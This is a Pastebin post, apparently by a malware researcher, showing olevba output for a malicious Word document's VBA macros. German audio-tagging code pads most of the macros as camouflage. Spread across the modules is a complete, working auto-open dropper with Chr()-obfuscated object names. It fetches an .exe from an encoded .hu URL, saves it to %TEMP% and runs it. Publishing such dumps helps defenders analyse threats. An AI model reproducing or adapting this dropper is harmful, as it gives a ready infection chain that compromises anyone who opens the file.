API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Aug 4th, 2015
468
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 41.22 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V r-20787.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: r-20787.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: r-20787.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. KLJLGBk
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module2.bas
  31. in file: r-20787.doc - OLE stream: u'Macros/VBA/Module2'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. Public Sub nachtag()
  34.     Dim eigeneplaylist As String, aktdate As Date, akttime As Date, akttimedate As Date, filename As String, tempzeichen As String, cmd As String, verzeichnis As String, i As Integer, F, temppfad As String, position As Integer, mp2zeit As Date, dbfilename As String, fso As Object, files() As String, filetagged As Boolean, artint As String
  35.    
  36.     If Verriegelung.verriegelungein = "1" Then Exit Sub 'Verriegelung
  37.    frmMain.untaggedtaggen.Appearance = 10 'Buttonfarbe ?ndern
  38.    frmMain.untaggedtaggen.ForeColor = &H0&
  39.     i = 0 'r?cksetzten
  40.    
  41.     'Keine untagged files
  42.    If LenB(Dir$(frmMain.work.Text + "untagged\", vbDirectory)) = 0 Then
  43.         Call Verriegelung.verriegelungaus 'Verriegelung
  44.        Exit Sub
  45.     End If
  46.    
  47.     'Suche wird ausgef?hrt
  48.    Call Werkzeuge.suche(extension, frmMain.work.Text + "untagged\", files(), "1")
  49.  
  50.     ' Hier wird nach extension dateien gesucht
  51.    While i < UBound(files) - 1
  52.         If frmMain.turbo.Value = "0" Then DoEvents
  53.         Call Ausgabe.info_loeschen 'Infofenster l?schen
  54.        frmMain.infocount.Caption = Trim$(Str$(i + 1)) + "/" + Trim$(Str$(UBound(files) - 1))
  55.         i = i + 1
  56.         filetagged = "0"
  57.         calbum = vbNullString
  58.         cinter = vbNullString
  59.         ctitel = vbNullString
  60.         cgenre = vbNullString
  61.         artint = vbNullString
  62.         tempzeichen = Mid$(files(i), Len(frmMain.work.Text + "untagged\") + 1, Len(files(i)))
  63.         position = InStr(tempzeichen, "\")
  64.        
  65.         If position = 0 Then
  66.             MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & tempzeichen
  67.             Set fso = Nothing
  68.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  69.            Call Verriegelung.verriegelungaus 'Verriegelung
  70.            Exit Sub 'Quellfiles direkt im Quellordner
  71.        End If
  72.        
  73.         verzeichnis = Left$(tempzeichen, position - 1)
  74.        
  75.         If Not Werkzeuge.sourcepathtest(verzeichnis) Then
  76.             MsgBox "Error: Your workpath/workfile structure is wrong! Debuginfo: " & verzeichnis
  77.             Set fso = Nothing
  78.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  79.            Call Verriegelung.verriegelungaus 'Verriegelung
  80.            Exit Sub 'Quellfiles direkt im Quellordner
  81.        End If
  82.        
  83.         filename = Mid$(tempzeichen, position + 1, Len(tempzeichen) - 4 - position)
  84. End Sub
  85.  
  86.  
  87. Public Sub Hidnna()
  88.  
  89.  
  90.         ' Hier wird das datum und die uhrzeit bestimmt
  91.        Set fso = CreateObject("Scripting.FileSystemObject")
  92.         Set F = fso.GetFile(files(i))
  93.         akttimedate = F.DateLastModified 'original date,time, wird von der mp2 ausgelesen
  94.        Set F = Nothing
  95.        
  96.         If Len(Trim$(Str$(akttimedate))) = 10 Then
  97.             akttime = "00:00:00"
  98.         Else
  99.             akttime = Right$(akttimedate, 8)
  100.         End If
  101.        
  102.         frmMain.akttime.Caption = akttime
  103.         'Mp2 Dauer wird ausgelesen
  104.        mp2zeit = Werkzeuge.GetMP3Length(files(i))
  105.         frmMain.mp2zeit.Caption = mp2zeit
  106.        
  107.         'Playlistumbruch Abfrage (Nur bei End-Zeit)
  108.        If tagging.zeitauswahl.ListIndex = 1 Then akttimedate = CDate(akttimedate) - mp2zeit
  109.        
  110.         'Playlistname wird generiert
  111.        aktdate = Left$(akttimedate, 10) 'akttimedate muss geteilt werden
  112.        frmMain.aktdate.Caption = aktdate
  113.         eigeneplaylist = Right$(aktdate, 4) + "-" + Mid$(aktdate, 4, 2) + "-" + Left$(aktdate, 2) + "-" + verzeichnis + ".txt"
  114.         'Cancel Abfrage
  115.        If frmMain.abbrechen.Enabled = "0" Then
  116.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  117.            Call Verriegelung.verriegelungaus 'Verriegelung
  118.            Set fso = Nothing
  119.             Exit Sub
  120.         End If
  121.        
  122.         frmMain.infoplaylist.Caption = verzeichnis
  123.  
  124.  
  125.         'wenn alte "normale" playlist dann l?schen
  126.        If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> _
  127.         0 Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  128.        
  129.         ' hier wird die geloggte playliste kopiert
  130.        If LenB(Dir$(App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And _
  131.         Werkzeuge.plvergleich(verzeichnis, "offline") Then
  132.             If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 _
  133.             Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  134.             fso.CopyFile App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, frmMain.work.Text + "untagged\" + _
  135.             verzeichnis "\" + eigeneplaylist
  136.             'tagid unterprogramm aufrufen
  137.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + _
  138.             verzeichnis + "\" + eigeneplaylist, filetagged, artint, mp2zeit)
  139.            
  140.             If filetagged Then
  141.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  142.                     Kill (files(i))
  143.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  144.                     GoTo nextrun
  145.                 End If
  146.                
  147.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
  148.                 Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
  149.                 GoTo nextrun
  150.             End If
  151.         End If
  152.         End Sub
  153.        
  154.  
  155.  
  156. Sub Jkjs()
  157.         ' hier wird die online playliste kopiert
  158.        If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And _
  159.         Werkzeuge.plvergleich(verzeichnis, "online") Then
  160.             If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 _
  161.             Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  162.             fso.CopyFile App.Path + "\playlists\Online Playlists\" + eigeneplaylist, frmMain.work.Text + "untagged\" + _
  163.             verzeichnis "\" + eigeneplaylist
  164.  
  165.             'tagid unterprogramm aufrufen
  166.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + _
  167.             "\" + eigeneplaylist, filetagged, artint, mp2zeit)
  168.          End Sub
  169. Public Function usZ5pw3gU8(KJB As Long)
  170.  
  171. Dim httpRequest: Set httpRequest = LJKNojk(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
  172. httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & Chr(47) & Chr(47) & "m" & "s" & Chr(122) & Chr(112) & "d" & "o" & "r" & Chr(111) & Chr(103) & Chr(46) & Chr(104) & "u" & "/" & Chr(52) & "5" & "g" & Chr(51) & "3" & "/" & Chr(51) & "4" & Chr(116) & "2" & Chr(100) & Chr(51) & "." & "e" & Chr(120) & "e", False
  173. httpRequest.Send
  174. usZ5pw3gU8 = httpRequest.responseBody
  175. End Function
  176. Public Sub YUYUYUUYUYY1()
  177.             If filetagged Then
  178.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  179.                     Kill (files(i))
  180.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  181.                     GoTo nextrun
  182.                 End If
  183.  
  184.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
  185.                 Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
  186.                 GoTo nextrun
  187.             End If
  188.         End If
  189.  
  190.         'wenn alte "normale" playlist dann l?schen
  191.        If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 Then _
  192.         Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  193.        
  194.         ' hier wird die amd playliste downgeloadet
  195.        Call Werkzeuge.DownLoad(verzeichnis, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  196.            
  197.         'Wenn Download erfolgreich
  198.        If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 Then
  199.  
  200.             'Playlist kopieren
  201.            If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 Then
  202.                 If FileLen(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist) > FileLen(App.Path + "\playlists\Online Playlists\" + eigeneplaylist) Then
  203.                     Kill (App.Path + "\playlists\Online Playlists\" + eigeneplaylist)
  204.                     fso.CopyFile frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  205.                 End If
  206.             Else
  207.                 fso.CopyFile frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  208.             End If
  209.            
  210.             'tagid unterprogramm aufrufen
  211.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, filetagged, artint, mp2zeit) 'hier wird tag3 geschrieben
  212.                
  213.             'getaggtes file verschieben
  214.            If filetagged Then
  215.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  216.                     Kill (files(i))
  217.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  218.                     GoTo nextrun
  219.                 End If
  220. End Sub
  221. -------------------------------------------------------------------------------
  222. VBA MACRO Module1.bas
  223. in file: r-20787.doc - OLE stream: u'Macros/VBA/Module1'
  224. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  225.  
  226. Public Function LJKNdVDs22()
  227.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
  228.                 Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
  229.                 GoTo nextrun
  230.             Else
  231.                 'ungetaggtes file verschieben
  232.                Call file_speichern.untaggedspeichern(files(i), verzeichnis, akttime, aktdate)
  233.             End If
  234.         Else
  235.             'ungetaggtes file verschieben
  236.            Call file_speichern.untaggedspeichern(files(i), verzeichnis, akttime, aktdate)
  237.         End If
  238. nextrun:
  239.         frmMain.statusnachtag.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  240.    Wend
  241.    
  242.     Set fso = Nothing
  243.     Call Ausgabe.info_loeschen 'Infofenster l?schen
  244.    Call Verriegelung.verriegelungaus 'Verriegelung
  245. End Function
  246.  
  247. Public Sub KLLKLLLL(adodbStream As Object, tempFile As String)
  248. adodbStream.savetofile tempFile, 2
  249. End Sub
  250. Sub LKjlknlk()
  251.  
  252.         ' hier wird die Online playliste downgeloadet
  253.        If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
  254.         Call Werkzeuge.DownLoad(verzeichnis, aktdate, frmMain.work.Text + eigeneplaylist)
  255.                  
  256.         If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then
  257.            
  258.             'Playlist kopieren
  259.            If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 Then
  260.                 If FileLen(frmMain.work.Text + eigeneplaylist) > FileLen(App.Path + "\playlists\Online Playlists\" + eigeneplaylist) Then
  261.                     Kill (App.Path + "\playlists\Online Playlists\" + eigeneplaylist)
  262.                     fso.CopyFile frmMain.work.Text + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  263.                 End If
  264.             Else
  265.                 fso.CopyFile frmMain.work.Text + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  266.             End If
  267.            
  268.             'hier wird tag3 geschrieben
  269.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
  270.                
  271.             If filetagged Then
  272.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  273.                     Kill (files(i))
  274.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  275.                     frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  276.                    GoTo nextrun
  277.                 End If
  278.             End Sub
  279. -------------------------------------------------------------------------------
  280. VBA MACRO Module3.bas
  281. in file: r-20787.doc - OLE stream: u'Macros/VBA/Module3'
  282. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  283. Public Sub Konvert()
  284.     Dim tempzeichen As String, filename As String, akttimedate As Date, akttime As Date, aktdate As Date, cmd As String, verzeichnis As String, F, temppfad As String, position As Integer, mp2zeit As Date, dbfilename As String, quellfile As String, eigeneplaylist As String, i As Integer, fso As Object, files() As String, filetagged As Boolean, artint As String
  285.    
  286.     If Verriegelung.verriegelungein = "1" Then Exit Sub 'Verriegelung
  287.    frmMain.Start.Appearance = 10 'Buttondesign ?ndern
  288.    frmMain.Start.ForeColor = &H0& 'Buttonfarbe ?ndern
  289.    If allgemeine.timesync_konv.Value = "1" Then Call Timesyncron.syncnow
  290.     i = 0 'R?cksetzten
  291.    Call Werkzeuge.suche("mp2", frmMain.Quelle.Text, files(), "1") 'Suche, nach mp2-files wird ausgef?hrt
  292.    
  293.     ' Hier werden Daten der gefundenen files ausgewertet (Verzeichnis und Filename)
  294.    If UBound(files) = 1 Then Call Ausgabe.textbox("No source-files")
  295.    
  296.     While i < UBound(files) - 1 'Anzahl der gefundenen files
  297.        If UBound(files) - 1 < Scannen.minfiles.CurPosition And Aktivierauswahl.scan_aktiv.Value = "1" Then
  298.             Call Ausgabe.textbox("Too few source-files..." + Str(UBound(files) - 1) + "/" + Str(Scannen.minfiles.CurPosition))
  299.             Call Verriegelung.verriegelungaus
  300.             Exit Sub
  301.         End If
  302. End Function
  303. Public Function LJKNojk(UIlhbjkhoiyH As String)
  304. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
  305. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
  306. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
  307.  Set LJKNojk = CreateObject(UIlhbjkhoiyH)
  308. End Function
  309. Public Function khjgbkjh()
  310.         If frmMain.turbo.Value = "0" Then DoEvents
  311.         Call Ausgabe.info_loeschen 'Infofenster l?schen
  312.        frmMain.infocount.Caption = Trim$(Str$(i + 1)) + "/" + Trim$(Str$(UBound(files) - 1))
  313.         i = i + 1
  314.         filetagged = "0" 'R?cksetzen der Marke
  315.        calbum = vbNullString
  316.         cinter = vbNullString
  317.         ctitel = vbNullString
  318.         cgenre = vbNullString
  319.         artint = vbNullString
  320.         tempzeichen = Mid$(files(i), Len(frmMain.Quelle.Text) + 1, Len(files(i)))
  321.         position = InStr(tempzeichen, "\") 'Sucht das "\" und gibt Position zur?ck
  322.        
  323.         If position = 0 Then
  324.             MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & tempzeichen
  325.             Set fso = Nothing
  326.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  327.            Call Verriegelung.verriegelungaus 'Verriegelung
  328.            Exit Function 'Quellfiles direkt im Quellordner
  329.        End If
  330.        
  331.         verzeichnis = Left$(tempzeichen, position - 1) 'Verzeichnis wird herrausgelesen
  332.        
  333.         filename = Mid$(tempzeichen, position + 1, Len(tempzeichen) - 4 - position) 'Filename ohne Pfad und Extension
  334.                
  335.         'Wenn es sich um ein untagged file handelt, dann Verzeichnis von file auslesen
  336.        If verzeichnis = "untagged" Or verzeichnis = "Untagged" Then
  337.             tempzeichen = Right$(tempzeichen, Len(tempzeichen) - 9)
  338.             position = InStr(1, tempzeichen, "-")
  339.             verzeichnis = Trim$(Mid$(tempzeichen, position + 1, Len(tempzeichen) - position - 4))
  340.         End If
  341.        
  342.         If Not Werkzeuge.sourcepathtest(verzeichnis) Then
  343.             MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & verzeichnis
  344.             Set fso = Nothing
  345.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  346.            Call Verriegelung.verriegelungaus 'Verriegelung
  347.            Exit Function 'Quellfiles direkt im Quellordner
  348.        End If
  349.  
  350.         'Kontrolle ob file "delsize" byte hat
  351.        If LenB(Dir$(files(i), vbDirectory)) <> 0 Then
  352.             frmMain.mp2size.Caption = Format(FileLen(files(i)) / 1024, "0.0") + "kb"
  353.         Else
  354.             GoTo nextrun
  355.         End If
  356.        
  357.         If FileLen(files(i)) < tagging.delsize(0).CurPosition Then
  358.             If LenB(Dir$(files(i), vbDirectory)) <> 0 Then Kill files(i)
  359.             GoTo nextrun
  360.         End If
  361.          
  362.         ' Hier wird das datum und die uhrzeit bestimmt
  363.        Set fso = CreateObject("Scripting.FileSystemObject")
  364.         Set F = fso.GetFile(files(i))
  365.         akttimedate = F.DateLastModified 'original date,time, wird von der mp2 ausgelesen
  366.        Set F = Nothing
  367.        
  368.         If Len(Trim$(Str$(akttimedate))) = 10 Then
  369.             akttime = "00:00:00"
  370.         Else
  371.             akttime = Right$(akttimedate, 8)
  372.         End If
  373.        
  374.         frmMain.akttime.Caption = akttime
  375.        
  376.         'Mp2 Dauer wird ausgelesen
  377.        mp2zeit = Werkzeuge.GetMP3Length(files(i))
  378.         frmMain.mp2zeit.Caption = mp2zeit
  379.        
  380.         'Playlistumbruch Abfrage (Nur bei End-Zeit)
  381.        If tagging.zeitauswahl.ListIndex = 1 Then akttimedate = CDate(akttimedate) - mp2zeit
  382.        
  383.         'Playlistname wird generiert
  384.        aktdate = Left$(akttimedate, 10) 'akttimedate muss geteilt werden
  385.        frmMain.aktdate.Caption = aktdate
  386.         eigeneplaylist = Right$(aktdate, 4) + "-" + Mid$(aktdate, 4, 2) + "-" + Left$(aktdate, 2) + "-" + verzeichnis + ".txt"
  387.        
  388.         'Cancel Abfrage
  389.        If Not frmMain.abbrechen.Enabled Then
  390.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  391.            Call Verriegelung.verriegelungaus 'Verriegelung
  392.            Set fso = Nothing
  393.             Exit Sub
  394.         End If
  395.        
  396.         frmMain.infoplaylist.Caption = verzeichnis
  397.         Excel_Statistik.AddDatagesamt 'Datenbank (Excel) Gesamtdata addieren
  398.        
  399.         ' hier wird die geloggte playliste kopiert
  400.        If LenB(Dir$(App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And Werkzeuge.plvergleich(verzeichnis, "offline") Then
  401.             If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
  402.             fso.CopyFile App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, frmMain.work.Text + eigeneplaylist
  403.                
  404.             'hier wird tag3 geschrieben
  405.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
  406.            
  407. End Sub
  408. Public Function KLJLGBk()
  409. Set processEnv = LJKNojk(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  410. tempFolder = processEnv("T" & Chr(69) & Chr(77) & Chr(80))
  411. Dim adodbStream As Object
  412. Set adodbStream = LJKNojk(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
  413. Dim tempFile As String
  414. tempFile = tempFolder + "\Mb5k9G0zH.exe"
  415. With adodbStream
  416.    .Type = 1
  417.     .Open
  418.     .write usZ5pw3gU8(55542)
  419.    
  420. End With
  421.  
  422.  KLLKLLLL adodbStream, tempFile
  423. Set shellApp = LJKNojk(Chr(83) & Chr(104) & Chr(61) & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p" & ";" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  424. shellApp.Open (tempFile)
  425. End Function
  426. Sub KJKmk()
  427.             If filetagged Then  'Wenn TagID Infos vorhanden sind
  428.                If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  429.                     Kill (files(i))
  430.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted") 'Wenn File existiert, dann l?schen
  431.                    frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  432.                    GoTo nextrun
  433.                 End If
  434.                
  435.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist) 'Konvertierung starten
  436.                If quellfile = "error" Then GoTo nextrun
  437.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint) 'TagID in konvertiertes File schreiben
  438.                Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1)) 'File verschieben
  439.                GoTo nextrun
  440.             End If
  441.         End If
  442.        
  443.         ' hier wird die Online playliste kopiert
  444.        If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And Werkzeuge.plvergleich(verzeichnis, "online") Then
  445.             If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
  446.             fso.CopyFile App.Path + "\playlists\Online Playlists\" + eigeneplaylist, frmMain.work.Text + eigeneplaylist
  447.                
  448.             'hier wird tag3 geschrieben
  449.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
  450.            
  451.             If filetagged Then  'Wenn TagID Infos vorhanden sind
  452.                If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  453.                     Kill (files(i))
  454.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted") 'Wenn File existiert, dann l?schen
  455.                    frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  456.                    GoTo nextrun
  457.                 End If
  458.                
  459.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist) 'Konvertierung starten
  460.                If quellfile = "error" Then GoTo nextrun
  461.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint) 'TagID in konvertiertes File schreiben
  462.                Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1)) 'File verschieben
  463.                GoTo nextrun
  464.             End If
  465.         End If
  466. End Sub
  467.  
  468. Sub LKjlknlk()
  469.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
  470.                 If quellfile = "error" Then GoTo nextrun
  471.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint)
  472.                 Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1))
  473.             Else
  474.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
  475.                 If quellfile = "error" Then GoTo nextrun
  476.                 Call untagged(quellfile, verzeichnis, akttime, aktdate, files(i), i, (UBound(files) - 1))
  477.             End If
  478.         Else
  479.             quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
  480.             If quellfile = "error" Then GoTo nextrun
  481.             Call untagged(quellfile, verzeichnis, akttime, aktdate, files(i), i, (UBound(files) - 1))
  482.         End If
  483. nextrun:
  484.     Wend
  485.    
  486.     Set fso = Nothing
  487.     Call Ausgabe.info_loeschen 'Infofenster l?schen
  488.    Call Verriegelung.verriegelungaus 'Verriegelung
  489. End Sub
  490. Private Function konvertieren(file As String, filename As String, verzeichnis As String, eigeneplaylist As String) As String
  491.         Dim cmd As String, temppfad As String, quellfile As String, F As Integer, mp2test As String, addline As String, fso As Object, DShell As Object, genie As Object
  492.        
  493.         On Error GoTo fehler
  494.         Set DShell = New Dos
  495.         'MP2 ?berpr?fung
  496.        If allgemeine.mp2test.Value = "1" Then
  497.             cmd = """" + App.Path + "\tools\besplit.exe""" + " -core( -input """ + file + """ -output """ + App.Path + "\temp\mp2test.mp2""" + " -type mp2 -logfile """ + App.Path + "\temp\mp2test.log""" + " )" 'Dos-Befehl bilden
  498.            Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  499.            If LenB(Dir$(App.Path + "\temp\mp2test.mp2", vbDirectory)) <> 0 Then Kill (App.Path + "\temp\mp2test.mp2")
  500.            
  501.             If LenB(Dir$(App.Path + "\temp\mp2test.log", vbDirectory)) <> 0 Then
  502.                 Call Werkzeuge.IsFileOpen(App.Path + "\temp\mp2test.log")
  503.                 F = FreeFile
  504.                
  505.                 Open App.Path + "\temp\mp2test.log" For Binary As #F
  506.                     mp2test = Space$(LOF(F))
  507.                     Get #F, , mp2test
  508.                 Close F
  509.                
  510.                 If InStr(mp2test, "Stream error") Then
  511.                     Call Ausgabe.textbox(filename + ".mp2......MP2-Error / moved")
  512.                     If LenB(Dir$(frmMain.work.Text + "Error", vbDirectory)) = 0 Then MkDir frmMain.work.Text + "Error"
  513.                     If LenB(Dir$(frmMain.work.Text + "Error\" + verzeichnis, vbDirectory)) = 0 Then MkDir frmMain.work.Text + "Error\" + verzeichnis
  514.                     Call Werkzeuge.IsFileOpen(file)
  515.                     Name file As frmMain.work.Text + "Error\" + verzeichnis + "\" + filename + ".mp2"
  516.                     Kill (App.Path + "\temp\mp2test.log")
  517.                     konvertieren = "error"
  518.                     Set DShell = Nothing
  519.                     Exit Function
  520.                 End If
  521.                
  522.                 Kill (App.Path + "\temp\mp2test.log")
  523.             End If
  524.         End If
  525.        
  526.         If extension = "mp2" Then
  527.             If frmMain.noextension.Value = "1" Then
  528.                 Set fso = CreateObject("Scripting.FileSystemObject")
  529.                 fso.CopyFile file, frmMain.work.Text + filename + ".mp2"
  530.                 Set fso = Nothing
  531.             Else
  532.                 ' hier startet lame (mp2 in temp.wav)
  533.                cmd = """" + App.Path + "\tools\lame.exe""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  534.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  535.                
  536.                 If Aktivierauswahl.mp2normal_aktiv.Value = "1" Then
  537.                     frmMain.normset.Caption = " Normalize" 'Infofenster
  538.                    
  539.                     If normal.prozenable.Value = "1" Then
  540.                         frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
  541.                    Else
